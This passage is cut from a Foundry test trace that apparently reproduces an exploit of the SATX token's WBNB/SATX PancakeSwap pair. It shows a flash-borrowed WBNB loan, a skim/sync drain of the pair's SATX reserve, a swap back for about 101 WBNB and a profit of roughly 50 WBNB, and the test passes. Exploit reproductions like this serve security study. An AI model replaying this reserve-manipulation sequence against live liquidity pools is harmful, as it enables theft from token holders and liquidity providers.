    │   │   │   │   ├─ [854] SATX::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 343018187469342431029408 [3.43e23]
    │   │   │   │   ├─ emit Sync(reserve0: 102562469507325298571 [1.025e20], reserve1: 343018187469342431029408 [3.43e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x661ea294000000004a1e8b491f43ea0b72980000000000058f57169e1ef5078b → 0x661ea2940000000048a30d9eb31eb748a8a00000000000058f57169e1ef5078b
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: SATX: [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508], value: 10465554903401366007889 [1.046e22])
    │   │   │   ├─ emit Transfer(from: SATX: [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508], to: 0x000132568A76a9b9BE9B1AAd2f40c359AfCC2bbB, value: 33955300373878478 [3.395e16])
    │   │   │   ├─ emit Transfer(from: SATX: [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508], to: 0x000132551Be5601a535065B6424328e8BDa9B1c5, value: 30868454885344071 [3.086e16])
    │   │   │   ├─ emit Transfer(from: SATX: [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508], to: 0x00013253ad5783BdDeA788277336BAdd3F5BC4A3, value: 28296083644898732 [2.829e16])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], value: 339553003738784788102111 [3.395e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x08691850d998b3120d0169b27e89f5421eaab41e24a4b8eaf529f63fe605ac45: 0x000000000000000000000000000000000000000000004a1e8b491f43ea0b7298 → 0x00000000000000000000000000000000000000000000908a4227c2a0c75c647f
    │   │   │   │   @ 12: 0 → 1
    │   │   │   │   @ 30: 118977 → 118978
    │   │   │   │   @ 32: 54767 → 54770
    │   │   │   │   @ 0xaaef1e9706005fd346f47fe5c8af43e22a7c25691d11f285bf877d5f348eb9da: 0 → 0x000000000000000000000000000000000000000000000000006487235e305dac
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000004a1e8b491f43ea0b7297 → 1639
    │   │   │   │   @ 0xb34209a263f6c38fe55f099e9e70f9d67e93982480ff3234a5e0108028ad164d: 0x0000000000000000000000000000000000000000000a4d8a70e3566a841c2caf → 0x0000000000000000000000000000000000000000000a4f05ee8dc28fb6def6a7
    │   │   │   │   @ 0x270ba1778f67ad7c8996d2a3468fadb8fccd1bf7fae18a10b8c3f8cccf43bee2: 0x00000000000000000000000000000000000000000000001e0a6ac068a3b11778 → 0x0000000000000000000000000000000000000000000002555fdffc2a763cd008
    │   │   │   │   @ 0x6e66320a7d126d06c0fbf655d8bdfdd4cab470042939936362c4b73a400717a4: 0 → 0x000000000000000000000000000000000000000000000000006daab23834c347
    │   │   │   │   @ 0xb283da3a23d219d2736af40aecb88778759760bac0edca6b4284f84ad7716ff0: 0 → 0x0000000000000000000000000000000000000000000000000078a22a7106d6ce
    │   │   │   └─ ← [Return] true
    │   │   ├─ [134617] pair_WBNB_SATX::skim(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─ [534] WBNB::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   │   └─ ← [Return] 102562469507325298571 [1.025e20]
    │   │   │   ├─ [3262] WBNB::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   ├─ emit Transfer(from: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [854] SATX::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   │   └─ ← [Return] 682571191208127219131519 [6.825e23]
    │   │   │   ├─ [122500] SATX::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 339553003738784788102111 [3.395e23])
    │   │   │   │   ├─ [465] pair_WBNB_SATX::token0() [staticcall]
    │   │   │   │   │   └─ ← [Return] WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c]
    │   │   │   │   ├─ [893] pair_WBNB_SATX::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 102562469507325298571 [1.025e20], 343018187469342431029408 [3.43e23], 1713283732 [1.713e9]
    │   │   │   │   ├─ [534] WBNB::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 102562469507325298571 [1.025e20]
    │   │   │   │   ├─ emit Transfer(from: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], to: 0xaB75f5fF781c57C1D2492bA412E1a468bBF62F01, value: 339553003738784788102111 [3.395e23])
    │   │   │   │   ├─ emit Transfer(from: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], to: SATX: [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508], value: 10152634811789665164190 [1.015e22])
    │   │   │   │   ├─ emit Transfer(from: SATX: [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508], to: 0x000132523ECd14981384DdA0715Ff0bE675F4939, value: 32940036892699512 [3.294e16])
    │   │   │   │   ├─ emit Transfer(from: SATX: [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508], to: 0x00013250d046129Ca507A1F5808eFcB938B5b01f, value: 29945488084272283 [2.994e16])
    │   │   │   │   ├─ emit Transfer(from: SATX: [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508], to: 0x0001324f61c27DBF4689eFcf3DdD304A7bCd858B, value: 27450030743916260 [2.745e16])
    │   │   │   │   ├─ emit Transfer(from: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 329400368926995122935810 [3.294e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 32: 54770 → 54773
    │   │   │   │   │   @ 0x08691850d998b3120d0169b27e89f5421eaab41e24a4b8eaf529f63fe605ac45: 0x00000000000000000000000000000000000000000000908a4227c2a0c75c647f → 0x0000000000000000000000000000000000000000000000bbd915a39ca734f500
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 1639 → 0x0000000000000000000000000000000000000000000045c0d46c7d26643ade69
    │   │   │   │   │   @ 0x0d56efffd394f7b1731c7771a626d0ec788fdc449984b272a7b004d97b223cb3: 0 → 0x0000000000000000000000000000000000000000000047e734890f821013bbdf
    │   │   │   │   │   @ 0x270ba1778f67ad7c8996d2a3468fadb8fccd1bf7fae18a10b8c3f8cccf43bee2: 0x0000000000000000000000000000000000000000000002555fdffc2a763cd008 → 0x00000000000000000000000000000000000000000000047bbebb9ed08cc0ecaf
    │   │   │   │   │   @ 0xd0b3d95ba37975fd738ece2964cac187aab03ce5204fdfc0327eb243136e5647: 0 → 0x000000000000000000000000000000000000000000000000006a634343e3849b
    │   │   │   │   │   @ 0x37f0e0f729e18eeed51bdd5db04a235d05e01a4ffc486219e5b00394c95bdddf: 0 → 0x000000000000000000000000000000000000000000000000006185a853908ee4
    │   │   │   │   │   @ 0x4e1ddb4384e2df204c0189e481aa77b7b84fbf2cbb84d3b3e48d9b55e5ce5df9: 0 → 0x000000000000000000000000000000000000000000000000007506c9fde0ab78
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [9300] pair_WBNB_SATX::sync()
    │   │   │   ├─ [534] WBNB::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   │   └─ ← [Return] 102562469507325298571 [1.025e20]
    │   │   │   ├─ [854] SATX::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   │   └─ ← [Return] 3465183730557642929408 [3.465e21]
    │   │   │   ├─ emit Sync(reserve0: 102562469507325298571 [1.025e20], reserve1: 3465183730557642929408 [3.465e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x661ea2940000000048a30d9eb31eb748a8a00000000000058f57169e1ef5078b → 0x661ea2940000000000bbd915a39ca734f5000000000000058f57169e1ef5078b
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] WBNB::transfer(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], 100000000000000 [1e14])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], value: 100000000000000 [1e14])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xc6c3a616e414a3fb90ac3240f431bdc9cce2ff8f36879d24455177ab8a85bdd5: 0x0000000000000000000000000000000000000000000000058f57169e1ef5078b → 0x0000000000000000000000000000000000000000000000058f5771912f6f478b
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000007b7c8430262dd1c5 → 0x0000000000000000000000000000000000000000000000007b7c293d15b391c5
    │   │   │   └─ ← [Return] true
    │   │   ├─ [850] SATX::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 329400368926995122937449 [3.294e23]
    │   │   ├─ [44021] PancakeSwap Router::swapExactTokensForTokensSupportingFeeOnTransferTokens(329400368926995122937449 [3.294e23], 0, [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ [15339] SATX::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], 329400368926995122937449 [3.294e23])
    │   │   │   │   ├─ [465] pair_WBNB_SATX::token0() [staticcall]
    │   │   │   │   │   └─ ← [Return] WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c]
    │   │   │   │   ├─ [893] pair_WBNB_SATX::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 102562469507325298571 [1.025e20], 3465183730557642929408 [3.465e21], 1713283732 [1.713e9]
    │   │   │   │   ├─ [534] WBNB::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 102562569507325298571 [1.025e20]
    │   │   │   │   ├─ [439] pair_WBNB_SATX::totalSupply() [staticcall]
    │   │   │   │   │   └─ ← [Return] 61148433405186571912580 [6.114e22]
    │   │   │   │   ├─ [893] pair_WBNB_SATX::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 102562469507325298571 [1.025e20], 3465183730557642929408 [3.465e21], 1713283732 [1.713e9]
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], value: 329400368926995122937449 [3.294e23])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PancakeSwap Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640563710043817390749050405311 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000045c0d46c7d26643ade69 → 0
    │   │   │   │   │   @ 0x08691850d998b3120d0169b27e89f5421eaab41e24a4b8eaf529f63fe605ac45: 0x0000000000000000000000000000000000000000000000bbd915a39ca734f500 → 0x00000000000000000000000000000000000000000000467cad8220c30b6fd369
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffff4611d7c67c9de028 → 0xffffffffffffffffffffffffffffffffffffffffffffba3e71a55aa0186301bf
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 8898032306111091141 [8.898e18]
    │   │   │   ├─ [893] pair_WBNB_SATX::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 102562469507325298571 [1.025e20], 3465183730557642929408 [3.465e21], 1713283732 [1.713e9]
    │   │   │   ├─ [854] SATX::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   │   └─ ← [Return] 332865552657552765866857 [3.328e23]
    │   │   │   ├─ [18675] pair_WBNB_SATX::swap(101492129775218155172 [1.014e20], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [3262] WBNB::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 101492129775218155172 [1.014e20])
    │   │   │   │   │   ├─ emit Transfer(from: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 101492129775218155172 [1.014e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000007b7c293d15b391c5 → 0x000000000000000000000000000000000000000000000005fbf8a38a736cf069
    │   │   │   │   │   │   @ 0xc6c3a616e414a3fb90ac3240f431bdc9cce2ff8f36879d24455177ab8a85bdd5: 0x0000000000000000000000000000000000000000000000058f5771912f6f478b → 0x0000000000000000000000000000000000000000000000000edaf743d1b5e8e7
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [534] WBNB::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1070439732107143399 [1.07e18]
    │   │   │   │   ├─ [854] SATX::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 332865552657552765866857 [3.328e23]
    │   │   │   │   ├─ emit Sync(reserve0: 1070439732107143399 [1.07e18], reserve1: 332865552657552765866857 [3.328e23])
    │   │   │   │   ├─ emit Swap(sender: PancakeSwap Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 100000000000000 [1e14], amount1In: 329400368926995122937449 [3.294e23], amount0Out: 101492129775218155172 [1.014e20], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x661ea2940000000000bbd915a39ca734f5000000000000058f57169e1ef5078b → 0x661ea29400000000467cad8220c30b6fd3690000000000000edaf743d1b5e8e7
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 110390162081329246313 [1.103e20]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] WBNB::transfer(pair_WBNB_CAKE: [0x0eD7e52944161450477ee417DE9Cd3a859b14fD0], 60150600000000000000 [6.015e19])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: pair_WBNB_CAKE: [0x0eD7e52944161450477ee417DE9Cd3a859b14fD0], value: 60150600000000000000 [6.015e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000005fbf8a38a736cf069 → 0x000000000000000000000000000000000000000000000002b936c78848d07069
    │   │   │   │   @ 0x774456c48aa6871068b68c947f132b492bb302d48e494377f521bc0164db1c16: 0x000000000000000000000000000000000000000000000bf5557c9148bc164848 → 0x000000000000000000000000000000000000000000000bf8983e6d4ae6b2c848
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0xc6c3a616e414a3fb90ac3240f431bdc9cce2ff8f36879d24455177ab8a85bdd5: 0x0000000000000000000000000000000000000000000000058f57169e1ef5078b → 0x0000000000000000000000000000000000000000000000058f5771912f6f478b
    │   │   │   @ 12: 0 → 1
    │   │   │   @ 0x08691850d998b3120d0169b27e89f5421eaab41e24a4b8eaf529f63fe605ac45: 0x0000000000000000000000000000000000000000000048a30d9eb31eb748a8a0 → 0x00000000000000000000000000000000000000000000908a4227c2a0c75c647f
    │   │   └─ ← [Stop]
    │   ├─ [2531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(pair_WBNB_CAKE: [0x0eD7e52944161450477ee417DE9Cd3a859b14fD0]) [staticcall]
    │   │   └─ ← [Return] 11390690994336824842219828 [1.139e25]
    │   ├─ [534] WBNB::balanceOf(pair_WBNB_CAKE: [0x0eD7e52944161450477ee417DE9Cd3a859b14fD0]) [staticcall]
    │   │   └─ ← [Return] 56531794167756852742216 [5.653e22]
    │   ├─ emit Sync(reserve0: 11390690994336824842219828 [1.139e25], reserve1: 56531794167756852742216 [5.653e22])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 60150600000000000000 [6.015e19], amount0Out: 0, amount1Out: 60000000000000000000 [6e19], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 9: 0x0000000000000000000000000000001b78e22dbdad09f7a4d5303e53d4ce3e53 → 0x0000000000000000000000000000001b78e2449c3b6b4bfe39dbf3e1d38ac3bf
    │   │   @ 10: 0x0000000000000000000000000001d50845569cbe92526b0dd9f9428879b0d18c → 0x0000000000000000000000000001d508538179458eef68415764642bd2bd9dbe
    │   │   @ 8: 0x661ea282000000000bf896276363f7864848000000096c12989a91f32e177134 → 0x661ea294000000000bf8983e6d4ae6b2c848000000096c12989a91f32e177134
    │   └─ ← [Stop]
    ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 50239562081329246313 [5.023e19]
    ├─ [9181] WBNB::withdraw(50239562081329246313 [5.023e19])
    │   ├─ [41] ContractTest::fallback{value: 50239562081329246313}()
    │   │   └─ ← [Stop]
    │   ├─ emit Withdrawal(src: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 50239562081329246313 [5.023e19])
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000002b936c78848d07069 → 0
    │   └─ ← [Stop]
    ├─  storage changes:
    │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 12: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 33.66s (31.39s CPU time)

Ran 2 test suites in 33.69s (34.83s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
